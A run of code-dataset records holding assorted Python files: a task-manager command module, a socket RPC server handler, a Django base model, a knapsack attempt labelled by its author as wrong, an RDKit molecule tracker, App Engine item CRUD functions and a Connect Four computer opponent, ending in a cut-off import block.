item['status'] != 'completed':\n\t\t\t\tproject = \"\"\n\t\t\t\tif item.get('project', None):\n\t\t\t\t\tproject = f\" [{item['project']}]\"\n\t\t\t\t\t\n\n\t\t\t\trespf(f\"#{item['id']}{project} - {item['description']}\")\t\n\nclass AddTask(Command):\n\tdef __init__(self, manager):\n\t\tsuper().__init__(manager)\n\t\tself.alias = ['add task', 'note']\n\t\t\n\tdef run(self, message):\n\t\tt = TaskAPI()\n\t\tresp = t.add(message)\n\t\tself.manager.say(resp)\n\t\t\nclass DoneTask(Command):\n\tdef __init__(self, manager):\n\t\tsuper().__init__(manager)\n\t\tself.alias = ['complete task', 'finish task']\n\t\t\n\tdef 
run(self, message):\n\t\tt = TaskAPI()\n\t\t_id = t.done(message)\n\t\tself.manager.say(f\"Task saved at ID {_id}.\")\t\n\t\t\nclass DeleteTask(Command):\n\tdef __init__(self, manager):\n\t\tsuper().__init__(manager)\n\t\tself.alias = ['remove task', 'delete task']\n\t\t\n\tdef run(self, message):\n\t\tt = TaskAPI()\n\t\tresp = t.delete(message)\n\t\tself.manager.say(resp)\t\t\n","sub_path":"commands/taskw.py","file_name":"taskw.py","file_ext":"py","file_size_in_byte":2601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"328480809","text":"#!/usr/bin/env python3\n\"\"\"提供进程间RPC通信的服务端\"\"\"\nimport pywind.evtframework.handler.tcp_handler as tcp_handler\nimport pywind.p_rpc.lib.rpc_func as rpc_func\nimport pywind.p_rpc.lib.proto as rpc_proto\nimport pywind.p_rpc.lib.jsonrpc as jsonrpc\n\nimport socket, json\n\n\nclass rpcd(tcp_handler.tcp_handler):\n __rpc_func = None\n __caddr = None\n __register_functions = None\n\n __proto_builder = None\n __proto_parser = None\n\n __js_builder = None\n __js_parser = None\n\n @property\n def caddr(self):\n return self.__caddr\n\n def __register_func(self, functions):\n if not self.__rpc_func: self.__rpc_func = rpc_func.func_call()\n for module in functions:\n for name, func in functions[module]: self.__rpc_func.register_function(name, func, module)\n return\n\n def init_func(self, creator_fd, register_functions, address=None, sock=None, caddr=None):\n if sock:\n self.set_socket(sock)\n\n self.__register_func(register_functions)\n self.__caddr = caddr\n\n self.__proto_builder = rpc_proto.builder()\n self.__proto_parser = rpc_proto.parser()\n\n self.__js_builder = jsonrpc.jsonrpc_builder(0)\n self.__js_parser = jsonrpc.jsonrpc_parser(0)\n\n self.register(self.fileno)\n self.add_evt_read(self.fileno)\n\n return self.fileno\n\n if isinstance(address, tuple):\n s = socket.socket()\n else:\n s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\n self.__register_functions = 
register_functions\n self.set_socket(s)\n self.bind(address)\n\n return self.fileno\n\n def after(self):\n self.listen(10)\n self.register(self.fileno)\n self.add_evt_read(self.fileno)\n\n def tcp_accept(self):\n while 1:\n try:\n cs, caddr = self.accept()\n self.create_handler(self.fileno, rpcd, self.__register_functions, sock=cs, caddr=caddr)\n except BlockingIOError:\n break\n return\n\n def __handle_rpc(self, rpc_data):\n try:\n pydict = self.__js_parser.parse(rpc_data)\n except jsonrpc.jsonrpcErr:\n self.delete_handler(self.fileno)\n return\n method = pydict[\"method\"]\n ok = True\n\n try:\n result = self.__rpc_func.call_func(method, pydict[\"params\"])\n except rpc_func.RPCNotFoundMethodErr:\n pydict = self.__js_builder.build_return_error(\n jsonrpc.E_NOT_FOUND_METHOD, \"cannot found method %s\" % method)\n ok = False\n except rpc_func.RPCInvalidParamsErr:\n pydict = self.__js_builder.build_return_error(\n jsonrpc.E_INVALID_PARAMS, \"invalid method params on function %s\" % method\n )\n ok = False\n\n if ok: pydict = self.__js_builder.build_return_ok(result)\n\n resp_data = self.__proto_builder.build_response(json.dumps(pydict))\n\n self.add_evt_write(self.fileno)\n self.writer.write(resp_data)\n\n def tcp_error(self):\n self.delete_handler(self.fileno)\n\n def tcp_timeout(self):\n pass\n\n def tcp_readable(self):\n # 只支持同步调用\n rdata = self.reader.read()\n self.__proto_parser.input(rdata)\n self.__proto_parser.parse()\n rs = self.__proto_parser.get_result()\n\n if rs == None:\n self.reader._putvalue(rdata)\n return\n self.__handle_rpc(rs)\n\n def tcp_writable(self):\n if self.writer.size() == 0: self.remove_evt_write(self.fileno)\n\n def tcp_delete(self):\n self.unregister(self.fileno)\n self.socket.close()\n","sub_path":"pywind/p_rpc/handler/p_rpcd.py","file_name":"p_rpcd.py","file_ext":"py","file_size_in_byte":3723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"386046366","text":"from django.db 
import models\nfrom datetime import datetime\n\n\nclass Root(models.Model):\n entry_date = models.DateTimeField(auto_now=True)\n\n @property\n def json(self):\n data = {}\n for key, value in self.__dict__.items():\n data[key] = str(value)\n return data\n\n def as_option(self, value, text, selected=''):\n return ''.format(getattr(self, value), selected, getattr(self, text))\n\n def as_option_by_two_text(self, value, text1, text2, selected=''):\n return ''.format(getattr(self,value), selected, getattr(self,text1), getattr(self, text2))\n\n class Meta:\n abstract = True\n\n validator = {}\n\n @classmethod\n def validate(cls, **kwargs):\n for key, value in kwargs.items():\n field = cls.validator.get(key, None)\n if field:\n rule = field.get('type', 'default')\n if not cls.validator_rule.get(rule, cls.validator_default)(value, **cls.validator[key]):\n return False\n\n @classmethod\n def validator_string(cls, v, **kwargs):\n print(v)\n [print(key + ':' + str(value)) for key, value in kwargs.items()]\n\n @classmethod\n def validator_email(cls, v, **kwargs):\n pass\n\n @classmethod\n def validator_reg(cls, v, **kwargs):\n return True\n\n @classmethod\n def validator_default(cls, v, **kwargs):\n return True\n\n validator_rule = {\n 'string': validator_string,\n 'email': validator_email,\n 'reg': validator_reg,\n 'default': validator_default\n }\n","sub_path":"secu/models/Root.py","file_name":"Root.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"298562854","text":"# 1. 무게1, 가치3 인 짐을 계속해서 담을 수 없기 때문에 안된다.\r\n# 2. 
역시 짐의 무게를 더해가는데 무게4짜리를 더한거에 한번 더 더하는 계산이 발생한다.\r\n\r\nfrom typing import List\r\n\r\nclass Solution:\r\n def __init__(self, dp: List[int]):\r\n self.dp = dp\r\n\r\n def backPack(self, N: int, K: int):\r\n load = []\r\n for _ in range(N):\r\n W, V = map(int, input().split())\r\n load.append((W, V))\r\n\r\n load.sort(key = lambda x: (x[0], x[1]))\r\n\r\n for weight, value in load:\r\n \r\n for i in range(1, K + 1):\r\n if i + weight >= K + 1:\r\n break\r\n \r\n if i == weight:\r\n self.dp[i] = max(value, self.dp[i])\r\n continue\r\n\r\n if self.dp[i] == -1:\r\n continue\r\n\r\n if self.dp[i] != -1:\r\n self.dp[i + weight] = max(self.dp[i] + value, self.dp[i + weight])\r\n \r\n\r\n print(self.dp)\r\n return max(self.dp)\r\n\r\n\r\n\r\n\r\nN, K = map(int, input().split())\r\n\r\ndp = [0] + [-1 for _ in range(K)]\r\n\r\nsol = Solution(dp)\r\n\r\nprint(sol.backPack(N, K))","sub_path":"geonhokim/4.Dynamic_Programming/평범한배낭_오답.py","file_name":"평범한배낭_오답.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"244917502","text":"########################################################################################################################\n\n__doc__ = \\\n \"\"\"\nKeep a copy of the mol.\n \"\"\"\n\n########################################################################################################################\n\nfrom rdkit import Chem\nfrom ._base import _MonsterBase\nfrom typing import List\n\nclass _MonsterTracker(_MonsterBase):\n \"\"\"\n _MonsterBase -> _MonsterTracker -> _MonsterCommunal\n \"\"\"\n\n def keep_copy(self, mol: Chem.Mol, label=None):\n copy = Chem.Mol(mol)\n if label is None:\n label = f'Mol#{len(self.modifications)}'\n copy.SetProp('_Name', label)\n if label not in self.modifications:\n self.modifications[label] = copy\n else:\n label += '_'\n self.keep_copy(mol, label)\n\n\n def keep_copies(self, mols: List[Chem.Mol], label=None):\n for i, mol 
in enumerate(mols):\n copy = Chem.Mol(mol)\n if label is None:\n this_label = f'Mol#{len(self.modifications)}'\n else:\n this_label = f'{label}#{i}'\n self.keep_copy(mol, this_label)\n","sub_path":"fragmenstein/monster/_modification_logging.py","file_name":"_modification_logging.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"477484296","text":"import logging\n\nfrom google.appengine.ext import ndb\nfrom flask_restplus import abort\n\nfrom src.beans.item import Item\nimport uuid\n\ndef create(args):\n\n if(not args.get('id', False)):\n args['id'] = str(uuid.uuid4())\n\n item = Item(\n **args\n )\n\n item.key = ndb.Key(Item, args['id'])\n \n item.put()\n\n return item\n\ndef update(id, args):\n\n get(id)\n args['id'] = id\n return create(args)\n\n\ndef get(id):\n\n item = ndb.Key(Item, id).get()\n if(item is None):\n abort(404, 'Item not found')\n\n return item\n\ndef list(offset, page_size):\n\n items = Item.query().order(Item.title).fetch(page_size, offset=offset)\n\n return items\n\ndef delete(id):\n\n item_key = ndb.Key(Item, id)\n item = item_key.get()\n\n if(item is None):\n abort(404, 'Item not found')\n\n item_key.delete()\n\n return None","sub_path":"src/biz/item.py","file_name":"item.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"192398970","text":"import random\nimport copy\n\nclass AIEasy(object):\n\t# Will block any 3 in a rows, or complete any self 3 in a rows\n\n\tcurr_choice = -1\n\tsetup_moves = [] # These will give the AI 3 in a row\n\tblock_moves = [] # These will BLOCK opponent from getting a 3 in a row\n\tsetup_and_block_moves = [] # These will setup AI and block opponent from getting 3inarow\n\tmoves_to_not_do = [] # These will make the opponent win\n\t\n\tneutral_options = [] # These have no major outcome on the game\n\tmedium_options = [] # 
These are setup and block (but not both)\n\n\tall_moves = [] # just 0 - 6\n\n\tdef __init__(self):\n\n\t\tself.curr_choice = -1\n\t\tself.good_options = []\n\t\tself.moves_to_not_do = []\n\t\tself.neutral_options = []\n\t\tself.all_moves = [0, 1, 2, 3, 4, 5, 6]\n\n\n\n\tdef make_move(self, game_board):\n\n\t\t# Find AI's 3 in a row. If it can win, do it.\n\t\t# Find opponent 3 in a row. If it can block, do it.\n\t\t# Avoid moves that will set up opponent for a guarenteed win\n\t\t# If none of these are options, make a random move\n\n\t\tmoves = None\n\n\t\t# 0 - Specific moves for the first turn\n\t\tif (game_board.filled_cells < 2):\n\t\t\t# On the first 2 turns, do only play in middle colums 3 through 5\n\t\t\trand_choice = random.randint(2, 4)\n\t\t\twhile (rand_choice != -1 and game_board.Cells[5][rand_choice].filled == True):\n\t\t\t\trand_choice = random.randint(2, 4)\n\t\t\tself.curr_choice = rand_choice\n\n\n\n\t\telif (game_board.filled_cells >= 2):\n\t\t\t\n\t\t\t# 1 - Look to complete AI's 3 in a row\n\t\t\tself.find_own_threeinrow(game_board)\n\n\t\t\t\n\t\t\t# 2 - Look to block your 3 in a row\n\t\t\tif (self.curr_choice == -1):\n\t\t\t\tself.find_your_threeinrow(game_board)\n\n\n\t\t\t# 3 - Randomize moves, avoiding setups\n\t\t\tif (self.curr_choice == -1):\n\n\t\t\t\tself.look_one_move_ahead(game_board)\n\n\t\t\t\t# Create the \"medium options\" list\n\t\t\t\tfor setup in self.setup_moves:\n\t\t\t\t\tif (setup not in self.medium_options):\n\t\t\t\t\t\tself.medium_options.append(setup)\n\t\t\t\tfor block in self.block_moves:\n\t\t\t\t\tif (block not in self.medium_options):\n\t\t\t\t\t\tself.medium_options.append(block)\n\n\t\t\t\t# Create the \"neutral options\" list\n\t\t\t\tfor i in range(0, 7):\n\t\t\t\t\tself.neutral_options.append(i)\n\n\n\t\t\t\t# Create the setup AND block options list\n\t\t\t\tfor i in range(0, 7):\n\t\t\t\t\tif (i in self.setup_moves and i in self.block_moves and i not in 
self.setup_and_block_moves):\n\t\t\t\t\t\tself.setup_and_block_moves.append(i)\n\n\n\n\t\t\t\t# Remove bad options from ALL the lists\n\t\t\t\tfor bad in self.moves_to_not_do:\n\t\t\t\t\tif bad in self.neutral_options:\n\t\t\t\t\t\tself.neutral_options.remove(bad)\n\t\t\t\t\tif bad in self.medium_options:\n\t\t\t\t\t\tself.medium_options.remove(bad)\n\t\t\t\t\tif bad in self.setup_and_block_moves:\n\t\t\t\t\t\tself.setup_and_block_moves.remove(bad)\n\n\n\n\t\t\t\t# # Print all my potential options\n\t\t\t\t# print(\"\\nNeutral options:\")\n\t\t\t\t# for neut in self.neutral_options:\n\t\t\t\t# \tprint(neut)\n\n\t\t\t\t# print(\"\\nBad options:\")\n\t\t\t\t# for bad in self.moves_to_not_do:\n\t\t\t\t# \tprint(bad)\n\n\t\t\t\t# print(\"\\nSetup options:\")\n\t\t\t\t# for setup in self.setup_moves:\n\t\t\t\t# \tprint(setup)\n\n\t\t\t\t# print(\"\\nBlock options:\")\n\t\t\t\t# for block in self.block_moves:\n\t\t\t\t# \tprint(block)\n\n\t\t\t\t# print(\"\\nSetup and block options:\")\n\t\t\t\t# for snb in self.setup_and_block_moves:\n\t\t\t\t# \tprint(snb)\n\n\n\t\t\t\tif (len(self.setup_and_block_moves) > 0):\n\t\t\t\t\tmoves = self.setup_and_block_moves\n\t\t\t\telif (len(self.medium_options) > 0 ):\n\t\t\t\t\tmoves = self.medium_options\n\t\t\t\telif (len(self.neutral_options) > 0):\n\t\t\t\t\tmoves = self.neutral_options\n\t\t\t\telse:\n\t\t\t\t\tmoves = self.all_moves\n\n\t\t\t\t\n\t\t\t\trand = random.randint(0, len(moves)-1)\n\t\t\t\trand_choice = moves[rand]\n\t\t\t\twhile (game_board.Cells[0][rand_choice].filled == True):\n\t\t\t\t\tif (len(moves) == 0):\n\t\t\t\t\t\tmoves = self.all_moves\n\t\t\t\t\trand = random.randint(0, len(moves)-1)\n\t\t\t\t\trand_choice = moves[rand]\n\t\t\t\t\tmoves.remove(rand_choice)\n\n\t\t\t\tself.curr_choice = rand_choice\n\n\n\n\t\tgame_board.make_move(self.curr_choice, 2, \"red\", 'x')\n\t\tself.curr_choice = -1\n\n\t\t# Reset all the potentital moves the AI had\n\t\tdel self.neutral_options[:]\n\t\tself.neutral_options = 
[]\n\t\tdel self.medium_options[:]\n\t\tself.medium_options = []\n\t\tdel self.moves_to_not_do[:]\n\t\tself.moves_to_not_do = []\n\t\tdel self.setup_moves[:]\n\t\tself.setup_moves = []\n\t\tdel self.block_moves[:]\n\t\tself.block_moves = []\n\t\tdel self.setup_and_block_moves[:]\n\t\tself.setup_and_block_moves = []\n\n\n\n\t# Combine these 2 methods into 1\n\tdef find_own_threeinrow(self, game_board):\n\n\t\tdef check_vertical():\n\t\t\tfor c in range(0, game_board.num_cols):\n\t\t\t\tself.count_cells_in_block_vertical(game_board, 2, c)\n\n\t\tdef check_horizontal():\n\t\t\tfor r in range(0, game_board.num_rows):\n\t\t\t\tfor c in range(0, game_board.num_cols-3):\n\t\t\t\t\t# Look at 4 cells at a time.\n\t\t\t\t\tself.count_cells_in_block_horizontal(game_board, 2, r, c, c+3)\n\t\t\t\t\t\n\t\tdef check_diagonal_up():\n\t\t\tfor r in range(3, game_board.num_rows):\n\t\t\t\tfor c in range(0, game_board.num_cols-3):\n\t\t\t\t\tself.count_cells_in_block_diag_up(game_board, 2, r, r-3, c, c+3)\n\n\t\tdef check_diagonal_down():\n\t\t\tfor r in range(0, game_board.num_rows-3):\n\t\t\t\tfor c in range(game_board.num_cols-3):\n\t\t\t\t\tself.count_cells_in_block_diag_down(game_board, 2, r, r+3, c, c+3)\n\n\n\t\tcheck_vertical()\n\t\tcheck_horizontal()\n\t\tcheck_diagonal_up()\n\t\tcheck_diagonal_down()\n\n\n\t\t\n\tdef find_your_threeinrow(self, game_board):\n\n\t\tdef check_vertical():\n\t\t\tfor c in range(0, game_board.num_cols):\n\t\t\t\tself.count_cells_in_block_vertical(game_board, 1, c)\n\n\t\tdef check_horizontal():\n\t\t\tfor r in range(0, game_board.num_rows):\n\t\t\t\tfor c in range(0, game_board.num_cols-3):\n\t\t\t\t\t# Look at 4 cells at a time.\n\t\t\t\t\tself.count_cells_in_block_horizontal(game_board, 1, r, c, c+3)\n\n\t\tdef check_diagonal_up():\n\t\t\tfor r in range(3, game_board.num_rows):\n\t\t\t\tfor c in range(0, game_board.num_cols-3):\n\t\t\t\t\tself.count_cells_in_block_diag_up(game_board, 1, r, r-3, c, c+3)\n\n\t\tdef 
check_diagonal_down():\n\t\t\tfor r in range(0, game_board.num_rows-3):\n\t\t\t\tfor c in range(game_board.num_cols-3):\n\t\t\t\t\tself.count_cells_in_block_diag_down(game_board, 1, r, r+3, c, c+3)\n\t\t\t\t\t\n\t\tcheck_vertical()\n\t\tcheck_horizontal()\n\t\tcheck_diagonal_up()\n\t\tcheck_diagonal_down()\n\n\n\n\n\tdef count_cells_in_block_vertical(self, game_board, player_num, c):\n\n\t\tstop_counting = False\n\t\tlike_cells = 0\n\t\tcurr_r = 0\n\t\topponent_num = 0\n\t\tif (player_num == 1):\n\t\t\topponent_num = 2\n\t\telse:\n\t\t\topponent_num = 1\n\n\n\t\twhile (stop_counting == False and curr_r < game_board.num_rows):\n\n\t\t\t# Check if the column is full\n\t\t\tif (game_board.Cells[0][c].filled == True):\n\t\t\t\tstop_counting = True\n\n\t\t\tif (game_board.Cells[curr_r][c].player_num == player_num):\n\t\t\t\t# Your cell. Add like cell\n\t\t\t\tlike_cells += 1\n\t\t\t\tif (like_cells == 3):\n\t\t\t\t\tstop_counting = True\n\t\t\t\t\tself.curr_choice = c\n\t\t\t\t\t\n\t\t\tif (game_board.Cells[curr_r][c].player_num == opponent_num):\n\t\t\t\tstop_counting = True\n\t\t\tcurr_r += 1\n\n\n\n\n\tdef count_cells_in_block_diag_up(self, game_board, player_num, r_start, r_end, c_start, c_end):\n\n\t\tlike_cells = 0\n\t\tchoice = -1\n\t\topponent_num = 0\n\t\tif (player_num == 1):\n\t\t\topponent_num = 2\n\t\telse:\n\t\t\topponent_num = 1\t\t\n\n\n\t\tc_curr = c_start\n\t\tr_curr = r_start\n\t\tfor r in range(r_end, r_start+1):\n\n\n\t\t\tif (game_board.Cells[r_curr][c_curr].player_num == player_num):\n\t\t\t\tlike_cells += 1\n\t\t\tif (game_board.Cells[r_curr][c_curr].player_num == opponent_num):\n\t\t\t\t# Not like, but its already filled\n\t\t\t\tlike_cells += -1\n\t\t\tc_curr+= 1\n\t\t\tr_curr+= -1\n\n\n\n\t\tif (like_cells == 3):\n\t\t\t# There were 3 like cells here. AI wants to go here. 
Find odd one out?\n\n\t\t\tchoice = -1\n\t\t\tc = c_start\n\t\t\trt = r_start\n\t\t\tfor x in range(0, 4):\n\t\t\n\t\t\t\tif (game_board.Cells[rt][c].filled == False):\n\n\t\t\t\t\tif (rt < game_board.num_rows-1):\n\t\t\t\t\t\t# This is the empty space it wants to fill\n\t\t\t\t\t\tif (game_board.Cells[rt+1][c].filled == True):\n\t\t\t\t\t\t\tchoice = c\n\t\t\t\t\t\t\tself.curr_choice = choice\n\n\t\t\t\t\t\t\tif (game_board.future == True and player_num == 1):\n\t\t\t\t\t\t\t\tif c not in self.moves_to_not_do:\n\t\t\t\t\t\t\t\t\tself.moves_to_not_do.append(c)\n\t\t\t\t\telif(rt == game_board.num_rows-1):\n\t\t\t\t\t\tchoice = c\n\t\t\t\t\t\tself.curr_choice = choice\n\t\t\t\t\t\tif (game_board.future == True and player_num == 1):\n\t\t\t\t\t\t\tif c not in self.moves_to_not_do:\n\t\t\t\t\t\t\t\tself.moves_to_not_do.append(c)\n\t\t\t\tc+=1\n\t\t\t\trt+=-1\n\n\n\n\tdef count_cells_in_block_diag_down(self, game_board, player_num, r_start, r_end, c_start, c_end):\n\n\t\tlike_cells = 0\n\t\tchoice = -1\n\t\topponent_num = 0\n\t\tif (player_num == 1):\n\t\t\topponent_num = 2\n\t\telse:\n\t\t\topponent_num = 1\t\t\n\n\n\t\tc_curr = c_start\n\t\tr_curr = r_start\n\t\tfor r in range(r_start, r_end+1):\n\n\t\t\tif (game_board.Cells[r_curr][c_curr].player_num == player_num):\n\t\t\t\tlike_cells += 1\n\t\t\tif (game_board.Cells[r_curr][c_curr].player_num == opponent_num):\n\t\t\t\t# Not like, but its already filled\n\t\t\t\tlike_cells += -1\n\t\t\tc_curr+= 1\n\t\t\tr_curr+= 1\n\n\n\n\t\tif (like_cells == 3):\n\t\t\t# There were 3 like cells here. AI wants to go here. 
Find odd one out?\n\n\t\t\tchoice = -1\n\t\t\tc = c_start\n\t\t\trt = r_start\n\t\t\tfor x in range(0, 4):\n\n\t\t\t\tif (game_board.Cells[rt][c].filled == False):\n\t\t\t\t\tif (rt < game_board.num_rows-1):\n\t\t\t\t\t\t# This is the empty space it wants to fill\n\t\t\t\t\t\tif (game_board.Cells[rt+1][c].filled == True):\n\t\t\t\t\t\t\tchoice = c\n\t\t\t\t\t\t\tself.curr_choice = choice\n\n\t\t\t\t\t\t\tif (game_board.future == True and player_num == 1):\n\t\t\t\t\t\t\t\tif c not in self.moves_to_not_do:\n\t\t\t\t\t\t\t\t\tself.moves_to_not_do.append(c)\n\t\t\t\t\telif(rt == game_board.num_rows-1):\n\t\t\t\t\t\tchoice = c\n\t\t\t\t\t\tself.curr_choice = choice\n\t\t\t\t\t\tif (game_board.future == True and player_num == 1):\n\t\t\t\t\t\t\tif c not in self.moves_to_not_do:\n\t\t\t\t\t\t\t\tself.moves_to_not_do.append(c)\n\t\t\t\tc+=1\n\t\t\t\trt+=1\n\n\n\n\tdef count_cells_in_block_horizontal(self, game_board, player_num, r, c_start, c_end):\n\n\t\tlike_cells = 0\n\t\tchoice = -1\n\t\topponent_num = 0\n\t\tif (player_num == 1):\n\t\t\topponent_num = 2\n\t\telse:\n\t\t\topponent_num = 1\n\n\t\tfor c in range(c_start, c_end+1):\n\t\t\tif (game_board.Cells[r][c].player_num == player_num):\n\t\t\t\tlike_cells += 1\n\t\t\tif (game_board.Cells[r][c].player_num == opponent_num):\n\t\t\t\t# Not like, but its already filled\n\t\t\t\tlike_cells += -1\n\n\t\t\n\t\tif (like_cells == 3):\n\t\t\t# There were 3 like cells here. AI wants to go here. 
Find odd one out?\n\n\t\t\tchoice = -1\n\t\t\tfor c in range(c_start, c_end+1):\n\t\t\t\tif (game_board.Cells[r][c].filled == False):\n\t\t\t\t\t# This is the empty space it wants to fill\n\t\t\t\t\tif (r < game_board.num_rows-1):\n\t\t\t\t\t\tif (game_board.Cells[r+1][c].filled == True):\n\t\t\t\t\t\t\tchoice = c\n\t\t\t\t\t\t\tself.curr_choice = choice\n\n\t\t\t\t\t\t\tif (game_board.future == True and player_num == 1):\n\t\t\t\t\t\t\t\tif c not in self.moves_to_not_do:\n\t\t\t\t\t\t\t\t\tself.moves_to_not_do.append(c)\n\n\t\t\t\t\telif (r == game_board.num_rows-1):\n\t\t\t\t\t\tchoice = c\n\t\t\t\t\t\tself.curr_choice = choice\n\t\t\t\t\t\tif (game_board.future == True and player_num == 1):\n\t\t\t\t\t\t\tif c not in self.moves_to_not_do:\t\n\t\t\t\t\t\t\t\tself.moves_to_not_do.append(c)\n\t\t\n\n\n\tdef look_one_move_ahead(self, game_board):\n\n\t\t# If the AI places something in this column, will this set up a 4 in a row for the oppponent?\n\t\t# If it does, then DONT do this move\n\n\t\tfor c in range(0, game_board.num_cols):\n\t\t\tfuture_board = copy.deepcopy(game_board)\n\t\t\tfuture_board2 = copy.deepcopy(game_board)\n\t\t\tfuture_board.future = True\n\t\t\tfuture_board.make_move(c, 2, \"black\", '?')\n\t\t\tself.look_for_good_moves(future_board2, c)\n\t\t\tself.find_your_threeinrow(future_board)\n\t\t\t# I have a future board for each possible column, check for possible human victory\n\t\t\t# If it makes one, then dont do this column\n\n\n\n\tdef look_for_good_moves(self, future_board, col):\n\n\t\t# Here I have the current board. 
Analyze it for:\n\t\t# AI 2 in a row (that can be 4) - Middle Priority\n\t\t# opponent 2 in a row (that can be 4) - Low Priority\n\t\t# If it is both, then that move is really good - High Priority\n\n\n\t\tmaster_board = copy.deepcopy(future_board)\n\n\t\t# Look for AI's good moves\n\t\tfuture_board = copy.deepcopy(master_board)\n\t\tself.check_if_good_move_vertical(future_board, col, 2)\n\t\tfuture_board = copy.deepcopy(master_board)\n\t\tself.check_if_good_move_horizontal(future_board, col, 2)\n\t\t# self.check_if_good_move_diag_up(future_board, col, 2)\n\t\t# self.check_if_good_move_diag_down(future_board, col, 2)\n\n\t\t# Look for opponent's good moves\n\t\tfuture_board = copy.deepcopy(master_board)\n\t\tself.check_if_good_move_vertical(future_board, col, 1)\n\t\tfuture_board = copy.deepcopy(master_board)\n\t\tself.check_if_good_move_horizontal(future_board, col, 1)\n\t\t# self.check_if_good_move_diag_up(future_board, col, 1)\n\t\t# self.check_if_good_move_diag_down(future_board, col, 1)\n\n\n\tdef check_if_good_move_vertical(self, future_board, col, player_num):\n\n\t\t# Find the highest empty spot.\n\t\ttop_empty_row = -1\n\t\tfor r in range(0, future_board.num_rows):\n\t\t\tif (future_board.Cells[r][col].filled == False):\n\t\t\t\ttop_empty_row = r\n\n\t\tif (top_empty_row >= 1 and top_empty_row <= 3):\n\t\t\t# Only care if at least 2 in this col\n\t\t\tif (future_board.Cells[top_empty_row+1][col].player_num == player_num and future_board.Cells[top_empty_row+2][col].player_num == player_num):\n\t\t\t\tif (player_num == 2):\n\t\t\t\t\tself.setup_moves.append(col)\n\t\t\t\telif (player_num == 1):\n\t\t\t\t\tself.block_moves.append(col)\n\n\n\tdef check_if_good_move_horizontal(self, future_board, col, player_num):\n\n\t\t# Find the highest empty spot.\n\t\ttop_empty_row = -1\n\t\tfor r in range(0, future_board.num_rows):\n\t\t\tif (future_board.Cells[r][col].filled == False):\n\t\t\t\ttop_empty_row = r\n\n\t\tif (top_empty_row >= 0 and top_empty_row <= 
6):\n\t\t\tfuture_board.Cells[top_empty_row][col].filled = True\n\t\t\tfuture_board.Cells[top_empty_row][col].player_num = player_num\n\n\n\t\t\n\t\tdef shadow_horizontal(game_board, player_num, r, col_check, c_start, c_end):\n\n\t\t\tlike_cells = 0\n\t\t\tchoice = -1\n\t\t\topponent_num = 0\n\t\t\tif (player_num == 1):\n\t\t\t\topponent_num = 2\n\t\t\telse:\n\t\t\t\topponent_num = 1\n\n\t\t\tfor c in range(c_start, c_end+1):\n\t\t\t\tif (game_board.Cells[r][c].player_num == player_num):\n\t\t\t\t\tlike_cells += 1\n\t\t\t\tif (game_board.Cells[r][c].player_num == opponent_num):\n\t\t\t\t\t# Not like, but its already filled\n\t\t\t\t\tlike_cells += -1\n\n\n\n\t\t\tif (like_cells == 3):\n\t\t\t\t# There were 3 like cells here. AI wants to go here. Find odd one out?\n\n\t\t\t\tif (r < game_board.num_rows-1):\n\t\t\t\t\t# Not bottom row\n\t\t\t\t\tif (game_board.Cells[r+1][c].filled == True):\n\t\t\t\t\t\tif (player_num == 1):\n\t\t\t\t\t\t\tif (col_check not in self.block_moves):\n\t\t\t\t\t\t\t\tself.block_moves.append(col_check)\n\t\t\t\t\t\telif (player_num == 2):\n\t\t\t\t\t\t\tif (col_check not in self.setup_moves):\n\t\t\t\t\t\t\t\tself.setup_moves.append(col_check)\n\n\n\n\t\t\t\telif (r == game_board.num_rows-1):\n\t\t\t\t\t# bottom row\n\t\t\t\t\tif (player_num == 1):\n\t\t\t\t\t\tif (col_check not in self.block_moves):\n\t\t\t\t\t\t\tself.block_moves.append(col_check)\n\t\t\t\t\telif (player_num == 2):\n\t\t\t\t\t\tif (col_check not in self.setup_moves):\n\t\t\t\t\t\t\tself.setup_moves.append(col_check)\n\n\n\t\t\n\t\tif (col == 0):\n\t\t\tshadow_horizontal(future_board, player_num, top_empty_row, col, 0, 3)\n\t\telif (col == 1):\n\t\t\tshadow_horizontal(future_board, player_num, top_empty_row, col, 0, 3)\n\t\t\tshadow_horizontal(future_board, player_num, top_empty_row, col, 1, 4)\n\t\telif (col == 2):\n\t\t\tshadow_horizontal(future_board, player_num, top_empty_row, col, 0, 3)\n\t\t\tshadow_horizontal(future_board, player_num, top_empty_row, col, 1, 
4)\n\t\t\tshadow_horizontal(future_board, player_num, top_empty_row, col, 2, 5)\n\t\telif (col == 3):\n\t\t\tshadow_horizontal(future_board, player_num, top_empty_row, col, 0, 3)\n\t\t\tshadow_horizontal(future_board, player_num, top_empty_row, col, 1, 4)\n\t\t\tshadow_horizontal(future_board, player_num, top_empty_row, col, 2, 5)\n\t\t\tshadow_horizontal(future_board, player_num, top_empty_row, col, 3, 6)\t\t\n\t\telif (col == 4):\n\t\t\tshadow_horizontal(future_board, player_num, top_empty_row, col, 1, 4)\n\t\t\tshadow_horizontal(future_board, player_num, top_empty_row, col, 2, 5)\n\t\t\tshadow_horizontal(future_board, player_num, top_empty_row, col, 3, 6)\n\t\telif (col == 5):\n\t\t\tshadow_horizontal(future_board, player_num, top_empty_row, col, 2, 5)\n\t\t\tshadow_horizontal(future_board, player_num, top_empty_row, col, 3, 6)\n\t\telif (col == 6):\n\t\t\tshadow_horizontal(future_board, player_num, top_empty_row, col, 3, 6)\n\n\n\n","sub_path":"AIEasy.py","file_name":"AIEasy.py","file_ext":"py","file_size_in_byte":15779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"430506966","text":"import cv2\nimport numpy as np\nimport os\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.externals import joblib\nfrom sklearn.ensemble import ExtraTreesClassifier\nfrom sklearn.feature_selection import SelectFromModel\nfrom sklearn.metrics import confusion_matrix\nimport pandas as pd\n\ndef 